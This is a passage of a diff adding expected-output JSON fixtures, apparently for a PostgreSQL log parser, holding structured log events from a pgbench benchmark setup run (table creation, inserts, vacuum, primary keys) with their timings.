"log.level": "LOG", + "log.offset": 3440, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (8,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 50000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3570, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.050 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3647, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (9,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 52000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3777, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.052 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3854, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (10,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 52000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3985, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: duration: 0.052 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.747Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4062, + "message": "2021-03-17 15:18:02.747 UTC [151] postgres@accounts LOG: statement: copy pgbench_accounts from stdin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "copy pgbench_accounts from stdin", + "postgresql.log.timestamp": "2021-03-17 15:18:02.747 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.987Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 239763008, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4164, + "message": "2021-03-17 15:18:02.987 UTC [151] postgres@accounts LOG: duration: 239.763 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:02.987 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:02.987Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4243, + "message": "2021-03-17 15:18:02.987 UTC [151] postgres@accounts LOG: statement: commit", + "postgresql.log.database": "accounts", + "postgresql.log.query": "commit", + "postgresql.log.timestamp": "2021-03-17 15:18:02.987 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.054Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 67302000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4319, + "message": "2021-03-17 15:18:03.054 UTC [151] postgres@accounts LOG: duration: 67.302 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.054 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.057Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4397, + "message": "2021-03-17 15:18:03.057 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_branches", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_branches", + "postgresql.log.timestamp": "2021-03-17 15:18:03.057 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.073Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 15246000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4498, + "message": "2021-03-17 15:18:03.073 UTC [151] postgres@accounts LOG: duration: 15.246 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.073 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.073Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4576, + "message": "2021-03-17 15:18:03.073 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:18:03.073 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.076Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 3531000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4676, + "message": "2021-03-17 15:18:03.076 UTC [151] postgres@accounts LOG: duration: 3.531 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.076 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.077Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4753, + "message": "2021-03-17 15:18:03.077 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_accounts", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.077 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.157Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 80735000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4854, + "message": "2021-03-17 15:18:03.157 UTC [151] postgres@accounts LOG: duration: 80.735 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.157 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.158Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 4932, + "message": "2021-03-17 15:18:03.158 UTC [151] postgres@accounts LOG: statement: vacuum analyze pgbench_history", + "postgresql.log.database": "accounts", + "postgresql.log.query": "vacuum analyze pgbench_history", + "postgresql.log.timestamp": "2021-03-17 15:18:03.158 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.159Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 893000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5032, + "message": "2021-03-17 15:18:03.159 UTC [151] postgres@accounts LOG: duration: 0.893 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.159 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.159Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5109, + "message": "2021-03-17 15:18:03.159 UTC [151] postgres@accounts LOG: statement: alter table pgbench_branches add primary key (bid)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "alter table pgbench_branches add primary key (bid)", + "postgresql.log.timestamp": "2021-03-17 15:18:03.159 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 5266000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5229, + "message": "2021-03-17 15:18:03.165 UTC [151] postgres@accounts LOG: duration: 5.266 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.165 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5306, + "message": "2021-03-17 15:18:03.165 UTC [151] postgres@accounts LOG: statement: alter table pgbench_tellers add primary key (tid)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "alter table pgbench_tellers add primary key (tid)", + "postgresql.log.timestamp": "2021-03-17 15:18:03.165 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.168Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2807000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5425, + "message": "2021-03-17 15:18:03.168 UTC [151] postgres@accounts LOG: duration: 2.807 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.168 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.168Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5502, + "message": "2021-03-17 15:18:03.168 UTC [151] postgres@accounts LOG: statement: alter table pgbench_accounts add primary key (aid)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "alter table pgbench_accounts add primary key (aid)", + "postgresql.log.timestamp": "2021-03-17 15:18:03.168 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:03.249Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 81593000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5622, + "message": "2021-03-17 15:18:03.249 UTC [151] postgres@accounts LOG: duration: 81.593 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:03.249 UTC", + "process.pid": 151, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.110Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5700, + "message": "2021-03-17 15:18:04.110 UTC [154] postgres@accounts LOG: statement: drop table if exists pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:18:04.110 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.130Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 20521000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5859, + "message": "2021-03-17 15:18:04.130 UTC [154] postgres@accounts LOG: duration: 20.521 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.130 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.132Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 5937, + "message": "2021-03-17 15:18:04.132 UTC [154] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.timestamp": "2021-03-17 15:18:04.132 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.143Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 11098000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6105, + "message": "2021-03-17 15:18:04.143 UTC [154] postgres@accounts LOG: duration: 11.098 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.143 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.143Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6183, + "message": "2021-03-17 15:18:04.143 UTC [154] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.143 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.152Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 8950000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6358, + "message": "2021-03-17 15:18:04.152 UTC [154] postgres@accounts LOG: duration: 8.950 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.152 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.152Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6435, + "message": "2021-03-17 15:18:04.152 UTC [154] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.152 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.156Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 4302000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6614, + "message": "2021-03-17 15:18:04.156 UTC [154] postgres@accounts LOG: duration: 4.302 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.156 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.156Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6691, + "message": "2021-03-17 15:18:04.156 UTC [154] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.156 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.163Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 6999000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6859, + "message": "2021-03-17 15:18:04.163 UTC [154] postgres@accounts LOG: duration: 6.999 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.163 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.164Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 6936, + "message": "2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: statement: begin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "begin", + "postgresql.log.timestamp": "2021-03-17 15:18:04.164 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.164Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 75000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7011, + "message": "2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: duration: 0.075 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.164 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.164Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7088, + "message": "2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: statement: truncate table pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "truncate table pgbench_accounts, pgbench_branches, pgbench_history, pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:18:04.164 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.164Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 676000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7241, + "message": "2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: duration: 0.676 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.164 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.164Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7318, + "message": "2021-03-17 15:18:04.164 UTC [154] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.164 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 247000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7442, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.247 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7519, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 164000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7649, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.164 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7726, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 80000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7856, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: duration: 0.080 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:18:04.165Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 7933, + "message": "2021-03-17 15:18:04.165 UTC [154] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:18:04.165 UTC", + "process.pid": 154, + "related.user": [ + "postgres" + ], + "service.type": 